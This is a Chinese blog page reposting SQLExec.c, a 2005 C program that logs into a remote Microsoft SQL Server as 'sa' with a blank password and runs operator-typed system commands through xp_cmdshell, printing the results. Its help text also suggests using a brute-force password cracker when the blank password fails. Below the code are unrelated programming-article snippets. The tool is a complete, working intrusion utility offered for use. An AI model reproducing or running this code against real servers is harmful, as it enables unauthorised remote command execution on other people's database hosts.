SQLExec.c

原创 2005年04月27日 16:45:00

#include <stdio.h>
#include <windows.h>
#include <wchar.h>
#include <sql.h>
#include <sqlext.h>
#include <lmcons.h>


int main(int argc, char *argv[])
{
 SQLCHAR Host[512]="";
 SQLCHAR *User=";UID=sa";
 SQLCHAR *Pass=";PWD=";
 SQLCHAR *Database="";
 SQLCHAR InConnectionString[1025]="";
 SQLCHAR rowBuff[200]="";
 SQLINTEGER   iRowBuff;
 UCHAR Query[1500]="";
 UCHAR Cmd[300]="";
 char inBuff[1025]=""; 
 SQLRETURN nResult;
 SWORD     sLen;
 SQLHDBC   hDbc;        
 HSTMT  hStmt;
 SQLHANDLE hEnvironment;
 int retries = 0;
 if(argc !=2)
 {
  printf("/n/n-------------SQLExec 1.0 for Windows NT/2K/9X-------------/n/nBy Egemen Tas (Send all feedbacks and bug reports to Junan007@163.com)/n/n");
  printf("/nUsage : SQLExec <Hostname> /n!!!!(Do not use ip addresses of targets)!!!!/n");
  return 0;
 }
 printf("/n/n-------------SQLExec 1.0 for Windows NT/2K/9X----------------/n/nBy Egemen Tas (Send all feedbacks and bug reports to Junan007@163.com)/n/n");
 memset(Query,0,1499);
 strcpy(Host,argv[1]);
 sprintf(InConnectionString,"DRIVER={SQL Server};SERVER=%s%s%s%s",Host,User,Pass,Database);
 
 if (SQLAllocHandle(SQL_HANDLE_ENV,SQL_NULL_HANDLE,&hEnvironment) != SQL_SUCCESS)
 {
   printf("SQLAllocHandle returned an error!/n");
   return 0;
 }

 if (SQLSetEnvAttr(hEnvironment, SQL_ATTR_ODBC_VERSION,(SQLPOINTER)
      SQL_OV_ODBC3, SQL_IS_INTEGER) != SQL_SUCCESS)
 {
   printf("SQLSetEnvAttr returned an error!/n");
   return 0;

 }

 if ((nResult = SQLAllocHandle(SQL_HANDLE_DBC,hEnvironment,(SQLHDBC FAR*)&hDbc)) != SQL_SUCCESS)
  {
   printf("SQLAllocHandle returned an error!/n");
   return 0;
  }

 while(retries < 4)
 {
 nResult = SQLDriverConnect(hDbc,NULL, InConnectionString,
         strlen(InConnectionString),
         inBuff,  1024, &sLen,
         SQL_DRIVER_COMPLETE_REQUIRED);     
 if(nResult == SQL_SUCCESS || nResult == SQL_SUCCESS_WITH_INFO)
 {
   printf("Ok.You have connected to MASTER database.../n");
   SQLAllocStmt(hDbc,&hStmt);
   break;
 }
 else
 {
  if(retries == 3)
  {
   printf("/nCould not connect to the SQL Server on the target!/n/nMake sure you use !!HOSTNAME NOT IP!!/n"
   "If you are using dial-up connection retry for a few times./n"
   "If you are sure that SQL server is installed on the target check that port 1433 is open./n"
   "If port 1433 is open and you have tried several times to connect, then probably SA does not have a NULL password./n"
   "Get a SQL server brute force cracker , try to hack passwords and try again./n"
   "If you are a script kiddy then go (www.technotronic.com or packetstorm.securify.com) , find some documents , read them at least 1 year and try again.:))");
  
  return 0;
  }
  retries++;
  printf("Performing retry(%d).../n",retries);
  Sleep(5000);
 }
 }
 printf("Now type dos command(s) to execute :");
 fgets(Cmd,299,stdin);
 Cmd[strlen(Cmd)-1]='/0';
 sprintf(Query,"EXEC master..xp_cmdshell /"%s/"",Cmd);
 printf("Trying to execute %s on the target/n",Cmd);
 if(SQLExecDirect(hStmt,Query,SQL_NTS) != SQL_SUCCESS)
 {
  printf("An error occured while performing your query."
   "This does not mean that your command is unsuccesfull.../n"
   "Check the result.If it didnt work then /n"
   "make sure you did not use duplicate keywords with ODBC api/n or the target does not have ' xp_cmdshell ' stored procedure.");
  return 0;
 }
 while (nResult != SQL_ERROR)
 {
      memset(rowBuff,0,99);
   nResult = SQLFetch(hStmt);
      if (nResult == SQL_ERROR || nResult == SQL_SUCCESS_WITH_INFO)
   {
         printf("Error while fething the results from the stored proc./n");
      }
      if (nResult == SQL_SUCCESS || nResult == SQL_SUCCESS_WITH_INFO){


         SQLGetData(hStmt, 1, SQL_C_CHAR, rowBuff, 100, &iRowBuff);
         printf("%s /n",rowBuff);
      } else
   {
         break;
      }
 }
 SQLFreeHandle(SQL_HANDLE_DBC,&hDbc);
 SQLFreeHandle(SQL_HANDLE_ENV,&hEnvironment);
 SQLFreeHandle(SQL_HANDLE_STMT,&hStmt);

return 0;
}

tool sqlexec

  • 2009年02月03日 08:54
  • 268KB
  • 下载

sqlexec.zip

  • 2011年03月07日 14:19
  • 261KB
  • 下载

WebLogic(12C)——安装教程

一,安装WebLogic Server 1,双击exe安装文件   2,准备安装文件   3,生成向导序列         4,选择安装路径   5,开始安装       经过以上...

c 使用libhdfs写数据 配置blocksize

在libhdfs提供的hdfswrite基础上修改好 自己的namenode ip及端口/** * Licensed to the Apache Software Foundation (ASF)...
  • wf1982
  • wf1982
  • 2012年06月29日 18:43
  • 5083

mac下配置进行c和matlab混编

mac下配置进行c和matlab混编 是用mac的小伙伴有时候有没有感觉很痛苦!遇到什么问题,找相关的解决办法真心不方便,我最近在搞一段程序,要进行c和matlab的混编,可是,在matlab中输入:...

学生信息管理系统(C实现)

头文件 1 #ifndef __SIMS__ 2 #define __SIMS__ 3 #include 4 #include 5 #includestring.h> 6 ...

Spire.Email 教程:如何删除C#,VB.NET中的电子邮件

Spire.Email 是一个专业且独立使用的.NET 电子邮件库,本教程介绍了如何删除C#,VB.NET中的电子邮件。...

C/C++ 控制台打飞机游戏

#include #include #include #include #define N 35 void print(int [][N]);//输出函数 void movebul(int [...

C和C++之间so库的互相调用

昨晚有个朋友问我关于在C中调用C++库的问题,今天午饭后,由于脖子痛的厉害而没有加入到我们组的“每天一战”的行列中去,所以正好将C和C++之间的库调用关系做个总结。 1.extern "C"的理...

串行通信i2c总线协议简明教程(连接方式,读写时序,24CXX系列EEPROM)

一、技术性能: 标准速率100kbit/s,快速模式400kbit/s,高速模式略; 支持多机通讯; 支持多主控模块,但同一时刻只允许有一个主控;      由数据线SDA和时钟SCL构成串...
  • yuyin86
  • yuyin86
  • 2012年03月15日 21:07
  • 1248
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:SQLExec.c
举报原因:
原因补充:

(最多只允许输入30个字)